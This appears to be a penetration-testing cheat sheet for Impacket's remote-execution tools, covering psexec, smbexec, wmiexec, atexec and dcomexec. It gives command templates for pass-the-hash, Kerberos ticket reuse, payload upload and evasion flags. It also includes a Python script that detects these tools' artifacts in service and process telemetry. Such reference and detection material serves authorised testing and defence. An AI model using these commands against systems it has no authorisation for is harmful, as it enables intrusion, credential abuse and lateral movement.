Impacket — Remote Execution

Quick Reference

Tool          Purpose
psexec.py     PSEXEC-like shell via SMB + RemComSvc (SYSTEM)
smbexec.py    Semi-interactive shell via service creation, no binary upload
wmiexec.py    Semi-interactive shell via WMI, low footprint
atexec.py     Single command execution via Task Scheduler
dcomexec.py   Semi-interactive shell via DCOM objects

psexec.py

PSEXEC-like functionality using RemComSvc — uploads a binary, creates a service, returns a SYSTEM shell.

Syntax:

psexec.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Password auth — interactive shell
psexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
psexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> psexec.py -k -no-pass <domain>/<username>@<target>

# AES key
psexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Execute single command
psexec.py <domain>/<username>:<password>@<target> <command>

# Upload and execute custom binary
psexec.py -c /local/path/payload.exe <domain>/<username>:<password>@<target>

# Custom service name (evasion)
psexec.py -service-name <service-name> <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> — NTLM hash auth
- -k — Kerberos auth via KRB5CCNAME ccache
- -no-pass — Skip password prompt (use with -k)
- -aesKey <aes256-key> — AES-128 or AES-256 Kerberos key
- -dc-ip <dc-ip> — Domain controller IP
- -target-ip <target> — Target IP when NetBIOS name can't resolve
- -c <pathname> — Upload file for execution; pass args via command
- -path <PATH> — Path of the command on target
- -service-name <name> — Custom service name for the payload
- -remote-binary-name <name> — Name of the uploaded executable
- -codec <codec> — Output encoding (default utf-8)
- -port <port> — Destination SMB port

Notes:
- Drops a binary on disk — most AV-detected
- Returns SYSTEM-level shell
- Requires admin share access (C$, ADMIN$)


smbexec.py

Semi-interactive shell via service creation; output written to a share. No binary uploaded.

Syntax:

smbexec.py [options] <domain>/<username>:<password>@<target>

Common Usage:

# Password auth
smbexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
smbexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> smbexec.py -k -no-pass <domain>/<username>@<target>

# AES key
smbexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# PowerShell shell
smbexec.py -shell-type powershell <domain>/<username>:<password>@<target>

# Use custom share for output
smbexec.py -share <share> <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> — NTLM hash auth
- -k — Kerberos auth via KRB5CCNAME ccache
- -no-pass — Skip password prompt
- -aesKey <aes256-key> — AES Kerberos key
- -dc-ip <dc-ip> — Domain controller IP
- -target-ip <target> — Target IP when name can't resolve
- -share <share> — Share to grab output from (default: C$)
- -mode {SERVER,SHARE} — SHARE (default) or SERVER (needs root)
- -shell-type {cmd,powershell} — Command processor
- -service-name <name> — Custom service name

Notes:
- No binary upload — lower disk footprint than psexec
- Each command creates/starts/stops/deletes a service


wmiexec.py

Semi-interactive shell using Windows Management Instrumentation. Output written to ADMIN$.

Syntax:

wmiexec.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Password auth — interactive shell
wmiexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
wmiexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> wmiexec.py -k -no-pass <domain>/<username>@<target>

# AES key
wmiexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Execute single command (no shell)
wmiexec.py <domain>/<username>:<password>@<target> <command>

# Silent command (no output, no cmd.exe wrapper)
wmiexec.py -silentcommand -nooutput <domain>/<username>:<password>@<target> <command>

# PowerShell shell
wmiexec.py -shell-type powershell <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> — NTLM hash auth
- -k — Kerberos auth via KRB5CCNAME ccache
- -no-pass — Skip password prompt
- -aesKey <aes256-key> — AES Kerberos key
- -dc-ip <dc-ip> — Domain controller IP
- -target-ip <target> — Target IP when name can't resolve
- -share <share> — Share for output (default: ADMIN$)
- -nooutput — Don't print output (no SMB connection created)
- -silentcommand — Run without cmd.exe wrapper (no output)
- -shell-type {cmd,powershell} — Command processor
- -com-version MAJOR:MINOR — DCOM version override

Notes:
- Runs commands as the authenticated user (not SYSTEM)
- Lower AV footprint than psexec — no service creation
- Writes output to a temp file on ADMIN$, then reads it back
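The notes on psexec, smbexec and wmiexec above each name an on-host artifact (a service pointing at an uploaded binary, a service per command, output staged on an admin share). As an added defender-side example that is not part of this page or of Impacket, the following classifies constructed service-install and process-creation records by those artifacts. The default names it keys on (the BTOBTO service, __output and execute.bat, a random 8-letter exe under %systemroot%, output redirected to \\127.0.0.1\<share>\__<timestamp>) are assumed Impacket defaults; -service-name, -remote-binary-name and -share change them, so the rules match shape rather than fixed names.

```python
import re

# Constructed sample telemetry (not real events): service-install and
# process-creation records reduced to the fields the rules below need.
SAMPLE_EVENTS = [
    {"event": "service_install", "service": "BTOBTO",
     "image": "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 "
              "> %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat"},
    {"event": "service_install", "service": "kXwQ", "image": "%systemroot%\\UgJmNqWe.exe"},
    {"event": "service_install", "service": "VendorAgent", "image": "C:\\Program Files\\Vendor\\agent.exe"},
    {"event": "process_create", "parent": "WmiPrvSE.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.1234 2>&1"},
    {"event": "process_create", "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]

# Command output redirected to a loopback admin share (ADMIN$, C$ or a custom
# -share) under a "__" temp name: the artifact behind "writes output to a temp
# file on ADMIN$ then reads it back". Assumed default layout.
LOOPBACK_SHARE_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\[^\\ ]+\$\\__", re.IGNORECASE)
# smbexec-style service image: a %COMSPEC% one-liner that echoes the command into
# a batch file and redirects to __output (assumed default names).
SMBEXEC_IMAGE = re.compile(r"^%COMSPEC% /Q /c echo .*execute\.bat", re.IGNORECASE)
# psexec-style service image: a freshly uploaded exe with a random 8-letter name
# directly under %systemroot% (assumed default when -remote-binary-name is unset).
PSEXEC_IMAGE = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def classify(event):
    """Return (tool_family, reason) for one event, or None if nothing matched."""
    if event["event"] == "service_install":
        image, name = event["image"], event["service"]
        # Service names are attacker-chosen (-service-name), so match the image, not the name.
        if SMBEXEC_IMAGE.search(image) or LOOPBACK_SHARE_REDIRECT.search(image):
            return ("smbexec", f"service {name!r} runs a COMSPEC echo-to-share one-liner")
        if PSEXEC_IMAGE.search(image):
            return ("psexec", f"service {name!r} points at a random 8-letter exe in %systemroot%")
        return None
    if event["event"] == "process_create" and event.get("parent", "").lower() == "wmiprvse.exe":
        if LOOPBACK_SHARE_REDIRECT.search(event.get("cmdline", "")):
            return ("wmiexec", "WmiPrvSE.exe spawned cmd.exe with output redirected to a loopback admin share")
        # No redirect is consistent with -nooutput / -silentcommand; lower confidence, still review.
        return ("wmi-spawn", f"WmiPrvSE.exe spawned {event.get('image')} without a share redirect")
    return None


def scan(events):
    """Run classify() over a batch of events and return the hits in order."""
    return [hit for event in events if (hit := classify(event)) is not None]
```

In a real pipeline the records would come from service-install and process-creation telemetry with the parent process and full command line populated; the regexes above are the portable part.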


atexec.py

Execute a single command via the Task Scheduler (AT) service.

Syntax:

atexec.py [options] <domain>/<username>:<password>@<target> <command>

Common Usage:

# Password auth
atexec.py <domain>/<username>:<password>@<target> <command>

# Pass-the-Hash
atexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target> <command>

# Kerberos (ccache)
KRB5CCNAME=<ticket> atexec.py -k -no-pass <domain>/<username>@<target> <command>

# AES key
atexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target> <command>

# Use existing logon session (no cmd.exe, no output)
atexec.py -session-id <session-id> <domain>/<username>:<password>@<target> <command>

Options:
- -hashes <lm-hash>:<nt-hash> — NTLM hash auth
- -k — Kerberos auth via KRB5CCNAME ccache
- -no-pass — Skip password prompt
- -aesKey <aes256-key> — AES Kerberos key
- -dc-ip <dc-ip> — Domain controller IP
- -session-id <id> — Use existing logon session (no output, no cmd.exe)
- -silentcommand — Run without cmd.exe wrapper
- -codec <codec> — Output encoding

Notes:
- Single command only — no interactive shell
- Runs as SYSTEM via Task Scheduler


dcomexec.py

Semi-interactive shell using DCOM objects (ShellWindows, ShellBrowserWindow, MMC20).

Syntax:

dcomexec.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Password auth — interactive shell (default ShellWindows object)
dcomexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
dcomexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> dcomexec.py -k -no-pass <domain>/<username>@<target>

# AES key
dcomexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Use MMC20.Application object
dcomexec.py -object MMC20 <domain>/<username>:<password>@<target>

# Single command, no output (evasion)
dcomexec.py -silentcommand -nooutput <domain>/<username>:<password>@<target> <command>

# PowerShell shell
dcomexec.py -shell-type powershell <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> — NTLM hash auth
- -k — Kerberos auth via KRB5CCNAME ccache
- -no-pass — Skip password prompt
- -aesKey <aes256-key> — AES Kerberos key
- -dc-ip <dc-ip> — Domain controller IP
- -object {ShellWindows,ShellBrowserWindow,MMC20} — DCOM object (default: ShellWindows)
- -share <share> — Share for output (default: ADMIN$)
- -nooutput — Don't fetch command output
- -silentcommand — No cmd.exe wrapper, no output (can't run dir/cd)
- -shell-type {cmd,powershell} — Command processor
- -com-version MAJOR:MINOR — DCOM version override

Notes:
- Runs as the authenticated user's privilege level
- ShellWindows requires an interactive session on target
- MMC20 works without an interactive session